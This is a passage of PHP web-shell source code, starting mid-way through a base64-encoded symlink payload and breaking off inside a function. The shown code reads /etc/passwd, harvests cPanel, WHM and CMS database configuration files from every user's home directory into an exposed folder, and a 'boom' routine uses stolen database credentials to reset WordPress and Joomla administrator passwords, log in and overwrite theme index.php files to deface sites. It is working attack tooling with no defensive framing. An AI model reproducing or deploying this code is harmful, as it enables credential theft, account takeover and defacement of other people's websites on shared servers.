cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLVpDc2hvcC50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcnRpY2xlL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1Od2FoeS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGUvZGIucGhwJywkc2l0ZXNzLictNy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy10cmFpZG50MS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00aW1hZ2VzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmdzLnR4dCcpIDsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcmVxdWlyZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLUFNNFNTLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2xva29tZWRpYS9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wby1jb250ZW50L2NvbmZpZy5waHAnLCRzaXRlc3MsJy1wb3BvamkudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92ZG9fY29uZmlnLnBocCcsJHNpdGVzcywnLVZvb2Rvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2J3X2NvbmZpZy9jb25maWcuaW5pJywkc2l0ZXNzLCctYm9zd2ViLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYndfY29uZmlnL2NvbmZpZy5pbmknLCRzaXRlc3MsJy1ib3N3ZWIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYXRhYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9rb2ZpZ3VyYXNpL2tvbmVrc2kucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmYvY29uZi5waHAnLCRzaXRlc3MsJy11bmtub3duLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2V0ZGF0YWJhc2UucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2RiL3NldGRhdGFiYXNlLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7Cn0KcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J2VjYm9zcy8nIHN0eWxlPSdjb2xvcjojMDBGRkZGJz5Eb25lIHwgQ2xpY2sgSGVyZSAhPC9mb250PiI7Cg==';
  731. $file = fopen("ecini.ler" ,"w+");
  732. $write = fwrite ($file ,base64_decode($config));
  733. fclose($file);
  734. chmod("ecini.ler",0755);
  735. echo "<center><a href='ecboss/ecini.ler'>Click Here !</a></center>";
  736. } elseif($_GET['do'] == 'config') {
  737. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  738. $idx = mkdir("3xp", 0777);
  739. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  740. $htc = fopen("3xp/.htaccess","w");
  741. fwrite($htc, $isi_htc);
  742. while($passwd = fgets($etc)) {
  743. if($passwd == "" || !$etc) {
  744. echo "<font color=red>Can't read /etc/passwd</font>";
  745. } else {
  746. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  747. foreach($user_config[1] as $user_idx) {
  748. $user_config_dir = "/home/$user_idx/public_html/";
  749. if(is_readable($user_config_dir)) {
  750. $grab_config = array(
  751. "/home/$user_idx/.my.cnf" => "cpanel",
  752. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  753. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  754. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  755. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  756. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  757. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  758. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  759. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  760. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  761. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  762. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  763. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  764. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  765. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  766. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  767. "/home/$user_idx/public_html/administrator/config.php" => "Joomla",
  768. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  769. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  770. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  771. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  772. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  773. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
  774. "/home/$user_idx/public_html/db/db.php" => "Unknown",
  775. "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
  776. "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
  777. "/home/$user_idx/public_html/database/db.php" => "Unknown",
  778. "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
  779. "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
  780. "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
  781. "/home/$user_idx/public_html/db/config.php" => "Unknown",
  782. "/home/$user_idx/public_html/db/database.php" => "Unknown",
  783. "/home/$user_idx/public_html/database/config.php" => "Unknown",
  784. "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
  785. "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
  786. "/home/$user_idx/public_html/conf/db.php" => "Unknown",
  787. "/home/$user_idx/public_html/conf/php.php" => "Unknown",
  788. "/home/$user_idx/public_html/conf/config.php" => "Unknown",
  789. "/home/$user_idx/public_html/conf/conf.php" => "Unknown",
  790. "/home/$user_idx/public_html/admin/koneksi.php" => "Unknown",
  791. "/home/$user_idx/public_html/cf/db.php" => "Unknown",
  792. "/home/$user_idx/public_html/config/index.php" => "Unknown",
  793. "/home/$user_idx/public_html/config/data.php" => "Unknown",
  794. "/home/$user_idx/public_html/admin/db.php" => "Unknown",
  795. "/home/$user_idx/public_html/admin/config.php" => "Unknown",
  796. "/home/$user_idx/public_html/admin/configuration.php" => "Unknown",
  797. "/home/$user_idx/public_html/admin/conf.php" => "Unknown",
  798. "/home/$user_idx/public_html/configuracion/connection.php" => "Unknown",
  799. "/home/$user_idx/public_html/connection" => "Unknown",
  800. "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown");
  801. foreach($grab_config as $config => $nama_config) {
  802. $ambil_config = file_get_contents($config);
  803. if($ambil_config == '') {
  804. } else {
  805. $file_config = fopen("3xp/$user_idx-$nama_config.txt","w");
  806. fputs($file_config,$ambil_config);
  807. }
  808. }
  809. }
  810. }
  811. }
  812. }
  813. echo "<center><a href='?cr0tz&folder=$dir/3xp'><font color=lime>Done</font></a></center>";
  814. } elseif($_GET['do'] == 'boom') {
  815. {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = 